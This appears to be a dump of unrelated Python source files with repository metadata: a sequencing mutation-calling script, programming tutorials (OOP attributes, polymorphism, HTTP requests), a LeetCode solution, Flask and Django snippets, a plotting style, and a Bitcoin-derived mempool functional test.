#EXTRACT OFFSET INFO
R1_info = offsetcheck(R1_seq,refseqs)
R2_info = offsetcheck(R2_seq,refseqs)
#QUALITY CONTROL#
if R1_info == 'bad' or R2_info == 'bad': continue
if R1_info[0] != R2_info[0]: continue
if R1_info[2] == R2_info[2]: continue
#END OF QUALITY CONTROL#
#CALL MUTATION
WT_Amp = R1_info[0]
refseq = refseqs[WT_Amp]
R1_offset = R1_info[1]
R1_strand = R1_info[2]
R2_offset = R2_info[1]
R2_strand = R2_info[2]
R1_seq = R1_seq[R1_offset:R1_offset+240]
R1_qual = R1_qual[R1_offset:R1_offset+240]
R2_seq = R2_seq[R2_offset:R2_offset+240]
R2_qual = R2_qual[R2_offset:R2_offset+240]
if R1_strand == 'R': R1_seq = rc(R1_seq); R1_qual.reverse()
if R2_strand == 'R': R2_seq = rc(R2_seq); R2_qual.reverse()
#QUALITY CONTROL#
if R1_seq != R2_seq: continue
#if min(R1_qual) < 30: continue
#if min(R2_qual) < 30: continue
#END OF QUALITY CONTROL#
Muts = []
for n in range(0,len(refseq)):
if R1_seq[n] != refseq[n] and R1_seq[n] == R2_seq[n]:
Mut = refseq[n]+str(n+1)+R1_seq[n]
Muts.append(Mut)
if len(Muts) == 0:
Muts = ['WT']
mfile.write(WT_Amp+"\t"+R1_bc[0:3]+"\t"+'-'.join(Muts)+"\n")
R1file.close()
R2file.close()
mfile.close()
print badBC, 'bad barcodes out of:', total
#READ IN REFERENCE SEQUENCE
reffile = open('Fasta/flu3amp.fa','r')
refseqs = {}
for line in reffile.xreadlines():
if '>' in line:
ID = line.rstrip().replace('>','')
else:
refseqs[ID] = line.rstrip()
#MAIN#
filenames = sorted(glob.glob('fastq/*_R1_*.fastq'))
for filename in filenames:
print filename
fileID = filename.rsplit('_')[4].rsplit('.')[0]
R1file = filename
R2file = filename.replace('_R1_','_R2_')
R1tmp = 'Read/'+fileID+'_R1'
R2tmp = 'Read/'+fileID+'_R2'
mfile = 'tmp/'+fileID+'.m'
readrecord(R1file,R1tmp)
readrecord(R2file,R2tmp)
MapNPair(R1tmp,R2tmp,mfile,refseqs)
os.system('cat tmp/*.m > result/AllM_3')
os.system('rm tmp/*')
| [
"wchnicholas@Nicholass-MacBook-Pro.local"
] | wchnicholas@Nicholass-MacBook-Pro.local |
864c00875017a868edaf771c62696c1523eb9c33 | c61798997614f4430a6a56b16e8d17fe75fb2f9c | /Yurii_Khomych/l_12_networking/http/example4_requests.py | bbbd1aeb087ff1dcf127b910a31d9a11e7c46132 | [] | no_license | YuriiKhomych/ITEA_AC | ad944bbe74be88f306a45f38efa70765c5286162 | f9eb147da1135a978929ae370d9c9fcd8dc59d21 | refs/heads/master | 2022-12-18T14:55:56.162451 | 2020-05-03T12:45:02 | 2020-05-03T12:45:02 | 234,373,863 | 0 | 9 | null | 2022-12-08T03:46:33 | 2020-01-16T17:26:50 | Python | UTF-8 | Python | false | false | 295 | py | import requests
# pip install requests
response1 = requests.get("http://localhost:8888")
response2 = requests.put("http://localhost:8888")
response3 = requests.post("http://localhost:8888")
response4 = requests.delete("http://localhost:8888")
response5 = requests.head("http://localhost:8888")
| [
"yuriykhomich@gmail.com"
] | yuriykhomich@gmail.com |
c930dbb97f7c177dc265d89c15a148b09c9a5b7a | 5c62ad2ab20bf950567ede70b7fe40b538b68168 | /Capitulos/Secao_16/atributos.py | 20ed20d46cdaae09233ff93d43fddf4eb43988cd | [] | no_license | Andremarcucci98/Python_udemy_geek_university | 0e9c8f2ff007e3095574d3964f45f5991dbe3437 | 1c487262f85542a82ceb5f222af675b8a00136f1 | refs/heads/master | 2023-03-30T20:18:43.022405 | 2021-04-01T15:41:22 | 2021-04-01T15:41:22 | 353,747,518 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,413 | py | """
POO - Atributos
Atributos -> Representam as características do objeto, ou seja, pelos atributos nós conseguimos representar
computacionalmente os estados de um objeto.
Em Python, dividimos os atributos em tres grupos:
- Atributos de instância;
- Atributos de classe;
- Atributos Dinâmicos;
# Atributo de Instância: São atributos declarados dentro do método construtor
# Obs.: Método Construtor é um método especial utilizado para construção do objeto.
# Em Java, uma classe Lampada, incluindo seus atributos ficariam mais ou menos:
public classe Lampada(){
private int voltage;
private String cor;
private Boolean ligada = false;
public Lampada(int voltage, String cor){
this.voltage = voltage;
this.cor = cor;
}
public int getVoltagem(){
return this.voltagem;
}
}
# Classes com atributos de instância públicos
class Lampada:
def __init__(self, voltagem, cor):
self.voltagem = voltagem
self.cor = cor
self.ligada = False
class ContaCorrente:
def __init__(self, numero, limite, saldo):
self.numero = numero
self.limite = limite
self.saldo = saldo
class Produto:
def __init__(self, nome, descricao, valor):
self.nome = nome
self.descricao = descricao
self.valor = valor
class Usuario:
def __init__(self, nome, email, senha):
self.nome = nome
self.email = email
self.senha = senha
# Atributos públicos e Atributos privados
Em Python, por convenção, ficou estabelecido que, todo atributo de uma classe é público
Ou seja, pode ser acessado em todo o projeto
Caso queiramos demonstrar que determinado atributo deve ser tratado como privado, ou seja,
que deve ser acessado/utilizado somente dentro da própria classe onde está declarado,
utiliza-se __ duplo underscore no inicio de seu nome.
Isso é conhecido também como Name Mangling.
class Acesso:
def __init__(self, email, senha):
self.email = email
self.__senha = senha
def mostra_senha(self):
print(self.__senha)
def mostra_email(self):
print(self.email)
# Obs.: Lembre-se que isso é apenas uma convenção, ou seja, a linguagem Python não
vai impedir que façamos acesso aos atributos sinalizados como privados fora da classe.
# Exemplo
user = Acesso('user@gmail.com', '123456')
#print(user.email)
#print(user.__senha) # AttributeError
print(user._Acesso__senha) # Temos acesso, mas não deveriamos fazer este acesso. (Name Mangling)
print(dir(user))
user.mostra_senha()
user.mostra_email()
# O que significa atributos de instância?
# Significa que ao criarmos instâncias/objetos de uma classe, todas as instâncias terão estes atributos.
user1 = Acesso('user1@gmail.com', '123456')
user2 = Acesso('user2@gmail.com', '678910')
user1.mostra_email()
user2.mostra_email()
# Atributos de Classe
p1 = Produto('Playstation 4', 'Video game', 2300)
p2 = Produto('XBOX S', 'Video game', 4500)
# Atributos de classe, atributos, claro, que são declarados diretamente na classe, ou seja,
# fora do construtor. Geralmente já inicializamos um valor e este valor é compartilhado entre
# todas as instâncias da classe. Ou seja, ao invés de cada instância da classe ter seus próprios
# valores como é o caso dos atributos de instância, com os atributos de classe todas as instâncias
# terão o mesmo valor para este atributo.
# Refatorando a classe Produto
class Produto:
#Atributo de classe
imposto = 1,05 # 0.05% de imposto
contador = 0
def __init__(self, nome, descricao, valor):
self.id = Produto.contador + 1 # Atributo de instância
self.nome = nome # Atributo de instância
self.descricao = descricao # Atributo de instância
self.valor = (valor * Produto.imposto) # Atributo de instância
Produto.contador = self.id # Atributo de classe
p1 = Produto('Playstation 4', 'Video game', 2300)
p2 = Produto('XBOX S', 'Video game', 4500)
print(p1.valor) # Acesso possivel, mas incorreto de um atributo de classe
print(p2.valor) # Acesso possivel, mas incorreto de um atributo de classe
# Obs.: Não precisamos criar uma instância de uma classe para fazer acesso a um atributo de classe
print(Produto.imposto) # Acesso correto de um atributo de classe
print(p1.id)
print(p2.id)
# Obs.: Em linguagens como Java, os atributos conhecidos como atributos de classe aqui em Python
# são chamados de atributos estáticos.
# Atributos Dinâmicos -> Um atributo de instância que pode ser criado em tempo de execução.
# Obs.: O atributo dinâmico será exclusivo da instância que o criou
p1 = Produto('Playstation 4', 'Video game', 2300)
p2 = Produto('Arroz', 'Mercearia', 5.99)
# Criando um atributo dinâmico em tempo de execução
p2.peso = '5kg' # Note que na classe Produto não existe o atributo peso
print(f'Produto: {p2.nome}, Descrição: {p2.descricao}, Valor: {p2.valor}, Peso: {p2.peso}')
#print(f'Produto: {p1.nome}, Descrição: {p1.descricao}, Valor: {p1.valor}, Peso: {p1.peso}') # AttributeError
# Deletando atributos
print(p1.__dict__)
print(p2.__dict__)
# print(Produto.__dict__)
del p2.peso
del p2.valor
del p2.descricao
print(p1.__dict__)
print(p2.__dict__)
""" | [
"marcuccimaciel.andre@gmail.com"
] | marcuccimaciel.andre@gmail.com |
929d1f1387585f01edaaa96587f151f481d5cb44 | b0856a2d66cc4c71705b8c16c169848070294cf6 | /Summary Ranges.py | ac541772efa8a7aabf421c8fd4beab2846344137 | [] | no_license | jfriend08/LeetCode | 9e378ff015edc3102a4785b0832cf0eeb09f5fc2 | f76d3cf2e7fd91767f80bd60eed080a7bad06e62 | refs/heads/master | 2021-01-21T19:28:25.354537 | 2016-01-15T04:53:11 | 2016-01-15T04:53:11 | 28,518,328 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,100 | py | """
Given a sorted integer array without duplicates, return the summary of its ranges.
For example, given [0,1,2,4,5,7], return ["0->2","4->5","7"].
Credits:
Special thanks to @jianchao.li.fighter for adding this problem and creating all test cases.
"""
class Solution(object):
def summaryRanges(self, nums):
beginning = None
rangeArray = []
isContinue = False
if len(nums)==1:
rangeArray.append(str(nums[0]))
return rangeArray
elif len(nums)==0:
return rangeArray
for i in range(len(nums)):
if beginning == None:
beginning = nums[i]
elif nums[i] - nums[i-1] != 1:
if nums[i-1] != beginning:
rangeArray.append(str(beginning) + "->" + str(nums[i-1]))
# rangeArray.append("%s->%s"%(beginning, nums[i-1]))
else:
rangeArray.append(str(nums[i-1]))
beginning = nums[i]
if nums[-1] != beginning:
rangeArray.append(str(beginning) + "->" + str(nums[-1]))
else:
rangeArray.append(str(nums[-1]))
return rangeArray | [
"ys486@cornell.edu"
] | ys486@cornell.edu |
ff13fbb8d07d76da28b56a59006d1440f8e4a641 | b0f327f70fad635664fd13b17414b5fea61b73f6 | /flask-tutorial/hello_tests/http_methods.py | 3ccf6610a020730c2d38e917c39920e6c9f7cd8a | [] | no_license | chelseyrandolph/flask-web | 7b70953f8d76840c33f6e30fa05072b5459ee8d2 | 1ed5b51ef18b898eb540ceaf4c6fb37ad227c904 | refs/heads/master | 2020-12-06T11:33:56.184928 | 2020-01-09T21:50:50 | 2020-01-09T21:50:50 | 232,452,995 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 333 | py | from flask import request, Flask
app = Flask(__name__)
@app.route('/login', methods=['GET', 'POST'])
def do_the_login():
return 'Logging in'
def show_the_login_form():
return 'Username:\nPassword:'
def login():
if request.method == 'POST':
return do_the_login()
else:
return show_the_login_form() | [
"chelseyrrandolph@gmail.com"
] | chelseyrrandolph@gmail.com |
c64f94ddcdfa8c5157ada222b81f8e74d880c758 | 58dd067b747aac2bf6a0f798c76de6312b6915dd | /1_base_OO_net/day25_interface/04_Polymorphism.py | fed82cef4909d524692b362c01e2949f55e129dd | [] | no_license | Nishinomiya0foa/Old-Boys | b4f5d0e6d8b384b55dfb8b8dc21d65152073315a | b771e01bab8dd99f612042e3335f1d36d3657009 | refs/heads/master | 2020-04-24T15:09:35.855357 | 2019-05-19T00:28:24 | 2019-05-19T00:28:24 | 172,054,441 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 921 | py | """多态 Polymorphism
多态:多个不同的类具有共同的方法func,调用方法func,得到的返回值不同。
把这个方法func提取出来,封装为一个接口g。不同类的实例作为参数传入接口g,得到不同的返回值
python,天生支持多态,是多态语言,python崇尚鸭子类型。
鸭子类型:不崇尚继承父类或实现接口而拥有方法或属性,而是依据其本身的方法或属性的集合决定
例如: list类和tuple类,非常相似,也没有采用继承的方式
优点:低耦合
缺点:太过自由
python是一门动态强类型语言。
"""
class WeChat:
def pay(self, money):
print('使用wechat支付了{}元'.format(money))
class Alipay:
def pay(self, money):
print('使用Alipay支付了{}元'.format(money))
def pay(pay_obj, money): # 统一支付入口
pay_obj.pay(money) | [
"mxstarbucks@sina.com"
] | mxstarbucks@sina.com |
cd2b2ba7963e038c41beeeb56467be21de72616e | f94d95c48589cc8ffb50b4e5cd24bc8847026351 | /sendhut/views.py | 8380871b8a96495c5f42a90165de9013602e82fc | [] | no_license | rpip/sendhut-essentials | 6a3c93edae6f2233a56e64445040287ab97eb011 | fb17b2418bd7a54115cc9847d36656a10895d57a | refs/heads/master | 2021-06-18T17:46:28.395697 | 2019-08-21T21:54:23 | 2019-08-21T21:54:23 | 203,622,656 | 0 | 1 | null | 2021-06-10T21:53:07 | 2019-08-21T16:23:47 | Python | UTF-8 | Python | false | false | 666 | py | from django.shortcuts import render
from sendhut.stores.models import Store
def home(request):
stores = Store.featured.all()
context = {
'page_title': 'Home',
'stores': stores
}
return render(request, 'home.html', context)
def about(request):
return render(request, 'about.html', {'page_title': 'About Us'})
def faqs(request):
return render(request, 'faqs.html', {'page_title': 'FAQs'})
def privacy(request):
return render(request, 'privacy.html', {
'page_title': 'Privacy Policy'
})
def terms(request):
return render(request, 'terms.html', {
'page_title': 'Terms and Conditions'
})
| [
"yao.adzaku@gmail.com"
] | yao.adzaku@gmail.com |
af82dbeedab330a88c7be75a7a5f2fd5bb84b030 | d0533b0574494b13606a557620f38f5a2c74ce16 | /venv/lib/python3.7/site-packages/mplfinance/_styledata/default.py | 93deed9a6e48a0a650cd69b8944f407f23590dfd | [
"GPL-1.0-or-later",
"MIT",
"LicenseRef-scancode-other-copyleft"
] | permissive | CatTiger/vnpy | af889666464ab661fb30fdb0e8f71f94ba2d1e41 | 7901a0fb80a5b44d6fc752bd4b2b64ec62c8f84b | refs/heads/master | 2020-09-26T00:37:54.123877 | 2020-07-13T10:15:46 | 2020-07-13T10:15:46 | 226,124,078 | 0 | 0 | MIT | 2020-04-21T03:02:20 | 2019-12-05T14:44:55 | C++ | UTF-8 | Python | false | false | 1,499 | py | style = dict(style_name = 'default',
base_mpl_style= 'seaborn-darkgrid',
marketcolors = {'candle' : {'up':'w', 'down':'k'},
'edge' : {'up':'k', 'down':'k'},
'wick' : {'up':'k', 'down':'k'},
'ohlc' : {'up':'k', 'down':'k'},
'volume' : {'up':'#1f77b4', 'down':'#1f77b4'},
'vcedge' : {'up':'#1f77b4', 'down':'#1f77b4'},
'vcdopcod': False, # Volume Color is Per Price Change On Day
'alpha' : 0.9,
},
mavcolors = ['#40e0d0','#ff00ff','#ffd700','#1f77b4',
'#ff7f0e','#2ca02c','#e377c2'],
y_on_right = False,
gridcolor = None,
gridstyle = None,
facecolor = '#DCE3EF',
rc = [ ('axes.edgecolor' , 'black' ),
('axes.linewidth' , 1.5 ),
('axes.labelsize' , 'large' ),
('axes.labelweight', 'semibold'),
('lines.linewidth' , 2.0 ),
('font.weight' , 'medium' ),
('font.size' , 12.0 ),
],
base_mpf_style= 'default'
)
| [
"guozc@133.com"
] | guozc@133.com |
678c1791f35c404611be00fcd77d75f8713773d3 | 9be1f3ffd2339e752f91eee86305076575309e33 | /AGC.py | 8d321f8a50917a8d84243691759588b6d622599a | [] | no_license | Index197511/AtCoder_with_Python | 5b48290bc32ad86aa58f66ad7c0e3510a2ea5518 | 7397e5df42371d1717b77442d3876787facf9641 | refs/heads/master | 2020-04-11T18:48:15.935498 | 2019-06-05T10:57:42 | 2019-06-05T10:57:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 270 | py | n=int(input())
a=list(map(int,input().split()))
cnt=0
for i in range(n):
tot=0
j=i
while True:
if j==(n-1):
break
tot+=a[j]
if tot==0:
cnt+=1
j+=1
if j==(n-1):
break
print(int(cnt))
| [
"hiro.saten@gmail.com"
] | hiro.saten@gmail.com |
db127761ae4ceb1bb63c04c61b631726e6298d19 | 4f7aa44d21ae38093869e79e10f5cdc8842d48b7 | /04-python-academy-files-lab/try_except_finally.py | 986d23e6c750e312790b2ad50d384dde4cdbef7b | [
"Apache-2.0"
] | permissive | iproduct/intro-python | 31e802c2c21a4df3361656f12d267ec52c2d6564 | 7e08e144da2907fcf45dc734ab4e896631625d75 | refs/heads/master | 2023-02-19T11:42:37.522624 | 2023-02-13T15:54:03 | 2023-02-13T15:54:03 | 128,980,155 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 763 | py | import sys
from io import UnsupportedOperation
if __name__ == '__main__':
FILENAME = "demofile.txt"
try:
f = open(FILENAME, "rt")
try:
f.write("Lorum Ipsum" + 12)
except UnsupportedOperation as ex:
print("The file is not open for writing")
print(f"Error: {ex}, {type(ex)=}")
# raise ex
except Exception as ex:
print("Something went wrong when writing to the file:", ex)
raise ex
else:
print("Data wtritten to file successfully.")
finally:
print("Closing file:", FILENAME)
f.close()
except:
print("Something went wrong with the file")
# raise ex
print("More work to do ...") | [
"office@iproduct.org"
] | office@iproduct.org |
268aa267950f36e59e87d3f85502504bad9f0e40 | c34a0e0308b97de8605b3189c4510aa8f265580b | /cocojson/tools/match_imgs.py | ee16d079b9d8b99336b8df97edbbc934e7d83808 | [
"MIT"
] | permissive | TeyrCrimson/cocojson | c1aa671d2e092677abb6de473ffd87c3a18bd3ae | edf4300daadb7f26d15c3ba6be72f60667a4ff3a | refs/heads/main | 2023-06-02T03:41:33.939082 | 2021-06-23T08:36:55 | 2021-06-23T08:36:55 | 379,777,169 | 0 | 0 | MIT | 2021-06-24T02:05:00 | 2021-06-24T02:04:59 | null | UTF-8 | Python | false | false | 1,702 | py | '''
Match images between COCO JSON A and COCO JSON B. Any images in JSON B that is not found in JSON A will be removed (along with associated annotations)
Match will be through image `file_name`.
'''
from warnings import warn
from cocojson.utils.common import read_coco_json, write_json_in_place
def match_imgs_from_file(cocojsonA, cocojsonB, outjson=None):
coco_dictA, setnameA = read_coco_json(cocojsonA)
coco_dictB, setnameB = read_coco_json(cocojsonB)
trimmed_cocodict = match_imgs(coco_dictA, coco_dictB)
write_json_in_place(cocojsonB, trimmed_cocodict, append_str='trimmed', out_json=outjson)
def match_imgs(coco_dictA, coco_dictB):
imgs_A = [ img['file_name'] for img in coco_dictA['images'] ]
new_imgs = []
present_imgs = []
img_id_map = {}
for img in coco_dictB['images']:
if img['file_name'] in imgs_A:
new_img_id = len(new_imgs) + 1
img_id_map[img['id']] = new_img_id
img['id'] = new_img_id
new_imgs.append(img)
present_imgs.append(img['file_name'])
coco_dictB['images'] = new_imgs
remainder = set(imgs_A) - set(present_imgs)
if len(remainder) > 0:
warn(f'The following images are present in reference coco json (cocojsonA) but not in coco json to be trimmed (cocojsonB): {remainder}')
new_annots = []
for annot in coco_dictB['annotations']:
if annot['image_id'] in img_id_map:
annot['image_id'] = img_id_map[annot['image_id']]
new_annot_id = len(new_annots) + 1
annot['id'] = new_annot_id
new_annots.append(annot)
coco_dictB['annotations'] = new_annots
return coco_dictB | [
"lingevan0208@gmail.com"
] | lingevan0208@gmail.com |
babf3556cc545666b1fd5bc0fa2e7c7c866d4d36 | 1dcea2a511f14a43701994f6a7785afd21a20d74 | /Algorithm/238_ProductOfArrayExceptSelf.py | 030464a484918661c1a3907dd92ed2f9a103745f | [] | no_license | lingtianwan/Leetcode2 | 66031e256a2928c6197516f83f14748c52e91b8c | 80a604cc09d5d2d62dd05157d8b829de675e4404 | refs/heads/master | 2021-01-13T11:17:18.238465 | 2017-02-09T01:43:38 | 2017-02-09T01:43:38 | 81,395,927 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 813 | py | # Given an array of n integers where n > 1, nums, return an array output such that output[i] is equal to the product of all the elements of nums except nums[i].
#
# Solve it without division and in O(n).
#
# For example, given [1,2,3,4], return [24,12,8,6].
#
# Follow up:
# Could you solve it with constant space complexity? (Note: The output array does not count as extra space for the purpose of space complexity analysis.)
class Solution(object):
def productExceptSelf(self, nums):
"""
:type nums: List[int]
:rtype: List[int]
"""
output = []
p = 1
for num in nums:
output.append(p)
p *= num
p = 1
for i, num in enumerate(nums[::-1]):
output[-1-i] *= p
p *= num
return output
| [
"lingtian.wan@gmail.com"
] | lingtian.wan@gmail.com |
15a360f877237724019cefa1b220d0b7e37d578b | 1255ba402b4eca4bb58ccfbb994311cac97cbf72 | /official_learning/gpu_learning/using_multiple_gpu02.py | d096c6c1190d9a741523bc7cc6100e4daa2635b7 | [] | no_license | suiup/tensorflow_learning | c5eaf85abc24feeab9b8e7ba6bc1f0e0ae525add | beb9940d951a0b9a902db9f2dcc7f2e63d278e49 | refs/heads/master | 2023-06-07T19:37:13.785541 | 2021-06-27T21:01:36 | 2021-06-27T21:01:36 | 374,089,087 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 661 | py | import tensorflow as tf
#建立可供运行时使用的多个逻辑 GPU 后,我们可以通过 tf.distribute.Strategy 或手动放置来利用多个 GPU。
# 使用 tf.distribute.Strategy
# 使用多个 GPU 的最佳做法是使用 tf.distribute.Strategy。下面是一个简单示例
tf.debugging.set_log_device_placement(True)
strategy = tf.distribute.MirroredStrategy()
with strategy.scope():
inputs = tf.keras.layers.Input(shape=(1,))
predictions = tf.keras.layers.Dense(1)(inputs)
model = tf.keras.models.Model(inputs=inputs, outputs=predictions)
model.compile(loss='mse',
optimizer=tf.keras.optimizers.SGD(learning_rate=0.2)) | [
"931857499@qq.com"
] | 931857499@qq.com |
a12a7754231293c6511a2c5d48beba01a1108a01 | 487ce91881032c1de16e35ed8bc187d6034205f7 | /codes/CodeJamCrawler/16_0_3/brusco/c.py | 16ff5c081f90011dc8ddb3c223656bee4d882cf7 | [] | no_license | DaHuO/Supergraph | 9cd26d8c5a081803015d93cf5f2674009e92ef7e | c88059dc66297af577ad2b8afa4e0ac0ad622915 | refs/heads/master | 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 | Python | UTF-8 | Python | false | false | 1,263 | py | import math
def trial_division(n):
candidate = 2
# no need to find a divisor by all means, just skip it if not found soon
max_candidate = min(math.sqrt(n), 1000)
while candidate < max_candidate:
if n % candidate == 0:
return candidate
# next candidate
if candidate == 2:
candidate = 3
else:
# skipping even candidates
candidate += 2
return None
binary = lambda number: bin(number)[2:]
if __name__ == "__main__":
raw_input()
length, jamcoins_count = tuple(int(value) for value in raw_input().split())
print "Case #1:"
found_jamcoins = 0
for i in xrange(0, pow(2, length - 2)):
coin = binary(i)
coin = "1" + ("0" * (length - 2 - len(coin))) + coin + "1"
divisors = []
for base in xrange(2, 11):
interpretation = int(coin, base)
divisor = trial_division(interpretation)
if divisor is None:
break
else:
divisors.append(divisor)
if len(divisors) == 9:
print coin, " ".join([str(divisor) for divisor in divisors])
found_jamcoins += 1
if found_jamcoins == jamcoins_count:
break
| [
"[dhuo@tcd.ie]"
] | [dhuo@tcd.ie] |
98a16b0699f3317e3568f473dc03c0b82b4daf6d | 8e07f5f06452f9566640d2130a5c1bcefcebd745 | /Django-CRM-master (1)/crm/asgi.py | eaba65d8a0999dd79986c88bea8639f3a360ab81 | [
"MIT"
] | permissive | bot242/djangocrm | 65dbe42a814fd538d77ec9c0cc5626a7d6ce19b4 | 6f5e64b4f65dbb13583d68ef5f6a3feaea51befb | refs/heads/main | 2023-01-23T10:29:32.338620 | 2020-12-02T06:43:35 | 2020-12-02T06:43:35 | 317,773,468 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 196 | py | import os
import django
from channels.routing import get_default_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "crm.settings")
django.setup()
application = get_default_application() | [
"sankarmass619@gmail.com"
] | sankarmass619@gmail.com |
92ffb2c60396fcf2b0da46542c5b53ee324bc361 | 07e8eaeaa6f3493546ba6b499be1593252f3c773 | /examples/optimizers/evolutionary/create_rra.py | 7b31f25940e6988859224e2d5a283e090c9b0ad0 | [
"Apache-2.0"
] | permissive | himanshuRepo/opytimizer | 91dd848fffbe85736d8074169d515e46a8b54d74 | 09e5485b9e30eca622ad404e85c22de0c42c8abd | refs/heads/master | 2023-07-20T18:16:00.565759 | 2021-09-02T19:40:43 | 2021-09-02T19:40:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 291 | py | from opytimizer.optimizers.evolutionary import RRA
# One should declare a hyperparameters object based
# on the desired algorithm that will be used
params = {
'd_runner': 2,
'd_root': 0.01,
'tol': 0.01,
'max_stall': 1000
}
# Creates an RRA optimizer
o = RRA(params=params)
| [
"gth.rosa@uol.com.br"
] | gth.rosa@uol.com.br |
0212b8dcf17fd5ff0a6125d8cc81a9f573a9bf9c | 8946774baf03ddc089f3bdd54c8fdfce2c48b93f | /proadv/api/management/commands/load_search_terms.py | 40fb5053fd2a4da532ead8adc5580fff3718d031 | [] | no_license | olavosamp/proadv_api | fdf9a44955f2e142d06ecf780c0ce76dada376b7 | 483e55164cf354638dc2531a44678942098c8721 | refs/heads/main | 2023-04-13T01:44:34.881869 | 2021-04-20T00:56:11 | 2021-04-20T00:56:11 | 357,301,408 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,287 | py | import json
from api.models import SearchTerm
from api.utils import get_search_term, check_valid_keys
from api.defines import SEARCH_TERM_KEY_DICT
from django.core.management import BaseCommand
class Command(BaseCommand):
help = "Imports search term data from a JSON file with format: [{classificacao: str, termo: str}, ...]"
def add_arguments(self, parser):
parser.add_argument('file_path', nargs='+', type=str)
def handle(self, *args, **options):
path = options['file_path'][0]
reference_keys = SEARCH_TERM_KEY_DICT.values()
print(f"\nLoading search terms from \n{path}")
with open(path) as file_handle:
string_data = file_handle.read()
object_list = []
for json_data in json.loads(string_data):
if not check_valid_keys(json_data.keys(), reference_keys):
print(f"\nInvalid data format: missing any of {list(reference_keys)}\nFile not loaded.")
continue
entry_dict = get_search_term(json_data)
new_entry = SearchTerm(**entry_dict)
object_list.append(new_entry)
print(f"\nFound {len(object_list)} search term objects.")
SearchTerm.objects.bulk_create(object_list)
print(f"Import finished.")
| [
"olavosamp@poli.ufrj.br"
] | olavosamp@poli.ufrj.br |
997d1934983b8deab7bab2fa546b9ca180129268 | a3d39c53b1abf4d35c9a9a1d8c8f226572f29bcd | /test/functional/mempool_unbroadcast.py | 4554a5c9859854c3a7cd0de7667a3b11d04b2ecc | [
"MIT"
] | permissive | BakedInside/Beans-Core | afc3a55efa3e14e62a19f4bc4d5ae5a357f5f1de | daa9b2ddbfd3305881749bda7f32146738154260 | refs/heads/master | 2022-07-30T05:42:26.680123 | 2021-05-22T15:35:40 | 2021-05-22T15:35:40 | 369,584,373 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,218 | py | #!/usr/bin/env python3
# Copyright (c) 2017-2020 The Beans Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test that the mempool ensures transaction delivery by periodically sending
to peers until a GETDATA is received."""
import time
from test_framework.p2p import P2PTxInvStore
from test_framework.test_framework import BeansTestFramework
from test_framework.util import (
assert_equal,
create_confirmed_utxos,
)
MAX_INITIAL_BROADCAST_DELAY = 15 * 60 # 15 minutes in seconds
class MempoolUnbroadcastTest(BeansTestFramework):
def set_test_params(self):
self.num_nodes = 2
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
self.test_broadcast()
self.test_txn_removal()
def test_broadcast(self):
self.log.info("Test that mempool reattempts delivery of locally submitted transaction")
node = self.nodes[0]
min_relay_fee = node.getnetworkinfo()["relayfee"]
utxos = create_confirmed_utxos(min_relay_fee, node, 10)
self.disconnect_nodes(0, 1)
self.log.info("Generate transactions that only node 0 knows about")
# generate a wallet txn
addr = node.getnewaddress()
wallet_tx_hsh = node.sendtoaddress(addr, 0.0001)
# generate a txn using sendrawtransaction
us0 = utxos.pop()
inputs = [{"txid": us0["txid"], "vout": us0["vout"]}]
outputs = {addr: 0.0001}
tx = node.createrawtransaction(inputs, outputs)
node.settxfee(min_relay_fee)
txF = node.fundrawtransaction(tx)
txFS = node.signrawtransactionwithwallet(txF["hex"])
rpc_tx_hsh = node.sendrawtransaction(txFS["hex"])
# check transactions are in unbroadcast using rpc
mempoolinfo = self.nodes[0].getmempoolinfo()
assert_equal(mempoolinfo['unbroadcastcount'], 2)
mempool = self.nodes[0].getrawmempool(True)
for tx in mempool:
assert_equal(mempool[tx]['unbroadcast'], True)
# check that second node doesn't have these two txns
mempool = self.nodes[1].getrawmempool()
assert rpc_tx_hsh not in mempool
assert wallet_tx_hsh not in mempool
# ensure that unbroadcast txs are persisted to mempool.dat
self.restart_node(0)
self.log.info("Reconnect nodes & check if they are sent to node 1")
self.connect_nodes(0, 1)
# fast forward into the future & ensure that the second node has the txns
node.mockscheduler(MAX_INITIAL_BROADCAST_DELAY)
self.sync_mempools(timeout=30)
mempool = self.nodes[1].getrawmempool()
assert rpc_tx_hsh in mempool
assert wallet_tx_hsh in mempool
# check that transactions are no longer in first node's unbroadcast set
mempool = self.nodes[0].getrawmempool(True)
for tx in mempool:
assert_equal(mempool[tx]['unbroadcast'], False)
self.log.info("Add another connection & ensure transactions aren't broadcast again")
conn = node.add_p2p_connection(P2PTxInvStore())
node.mockscheduler(MAX_INITIAL_BROADCAST_DELAY)
time.sleep(2) # allow sufficient time for possibility of broadcast
assert_equal(len(conn.get_invs()), 0)
self.disconnect_nodes(0, 1)
node.disconnect_p2ps()
def test_txn_removal(self):
self.log.info("Test that transactions removed from mempool are removed from unbroadcast set")
node = self.nodes[0]
# since the node doesn't have any connections, it will not receive
# any GETDATAs & thus the transaction will remain in the unbroadcast set.
addr = node.getnewaddress()
txhsh = node.sendtoaddress(addr, 0.0001)
# check transaction was removed from unbroadcast set due to presence in
# a block
removal_reason = "Removed {} from set of unbroadcast txns before confirmation that txn was sent out".format(txhsh)
with node.assert_debug_log([removal_reason]):
node.generate(1)
if __name__ == "__main__":
MempoolUnbroadcastTest().main()
| [
"lanorlasystem@gmail.com"
] | lanorlasystem@gmail.com |
